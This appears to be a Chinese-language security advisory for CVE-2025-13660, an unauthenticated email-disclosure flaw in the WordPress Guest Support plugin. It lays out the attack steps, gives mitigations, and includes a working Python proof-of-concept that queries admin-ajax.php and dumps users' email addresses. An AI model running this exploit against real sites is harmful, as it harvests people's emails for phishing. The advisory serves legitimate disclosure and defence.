CVE-2025-13660 WordPress Guest Support插件用户邮箱泄露漏洞

漏洞信息

漏洞编号

CVE-2025-13660

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Guest Support插件

漏洞概述

CVE-2025-13660是WordPress平台Guest Support插件中存在的一个敏感信息泄露漏洞。该漏洞影响版本1.2.3及以下所有版本。漏洞根源在于插件暴露了一个公开的AJAX端点（guest_support_handler=ajax），该端点允许未经认证的攻击者通过特定的请求参数（request=get_users）搜索并获取WordPress网站的用户邮箱地址。由于该端点缺乏任何身份验证或权限检查机制，攻击者可以无限制地枚举网站用户账户并提取其邮箱信息。此类信息泄露可能被用于钓鱼攻击、社会工程攻击或进一步的安全威胁组合。CVSS 3.1基础评分为5.3，属于中危级别，攻击复杂度低，无需认证和用户交互即可实现。

技术细节

漏洞存在于Guest Support插件的includes/library/ajax.php文件中（第22行附近）。该AJAX处理器函数未进行任何权限验证或用户认证检查，直接响应来自任何来源的请求。当接收到guest_support_handler=ajax和request=get_users参数时，插件会查询数据库中的用户表并返回用户邮箱地址。攻击者可以通过构造恶意的HTTP POST或GET请求到wp-admin/admin-ajax.php端点，指定action参数和上述参数组合，即可获取用户邮箱列表。由于WordPress的用户邮箱通常与用户名或管理员账户关联，攻击者可以识别管理员邮箱，进一步策划针对性的钓鱼攻击或凭据猜测攻击。插件开发者已在1.2.4版本中修复了此漏洞，添加了适当的权限检查和认证验证机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否使用WordPress平台，并检查Guest Support插件版本是否在1.2.3或以下

STEP 2

步骤2: 构造恶意请求

攻击者构造HTTP POST请求到/wp-admin/admin-ajax.php端点，包含参数action=guest_support_handler、guest_support_handler=ajax和request=get_users

STEP 3

步骤3: 发送未认证请求

攻击者发送恶意请求，无需任何认证凭据或用户交互，服务器直接响应用户邮箱数据

STEP 4

步骤4: 数据提取与分析

攻击者解析响应内容，提取用户邮箱地址列表，用于后续钓鱼攻击或社会工程攻击

STEP 5

步骤5: 恶意利用

攻击者利用获取的邮箱信息实施钓鱼攻击、凭据猜测或针对性的攻击活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13660 PoC - WordPress Guest Support Plugin User Email Disclosure
# Target: WordPress site with Guest Support plugin <= 1.2.3

def exploit_guest_support_email_disclosure(target_url):
    """
    Exploit for CVE-2025-13660
    This PoC demonstrates how an unauthenticated attacker can retrieve
    user email addresses from WordPress sites running Guest Support plugin.
    """
    
    # Target the AJAX endpoint
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload to request user emails
    data = {
        'action': 'guest_support_handler',
        'guest_support_handler': 'ajax',
        'request': 'get_users'
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {endpoint}")
    print("[*] Sending malicious request...")
    
    try:
        # Send unauthenticated request
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request successful!")
            print(f"[+] Response content:")
            print(response.text)
            return response.json()
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target-wordpress-site.com"
    
    exploit_guest_support_email_disclosure(target)

# Usage: python cve-2025-13660.py http://vulnerable-site.com
# Note: This PoC is for authorized security testing only

影响范围

WordPress Guest Support插件 <= 1.2.3

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 暂时禁用Guest Support插件；2) 使用.htaccess或Nginx配置阻止对/admin-ajax.php端点的特定请求模式；3) 部署Web应用防火墙规则过滤guest_support_handler参数；4) 加强用户安全意识培训，警惕针对泄露邮箱的钓鱼邮件；5) 监控服务器日志，关注异常的AJAX请求行为。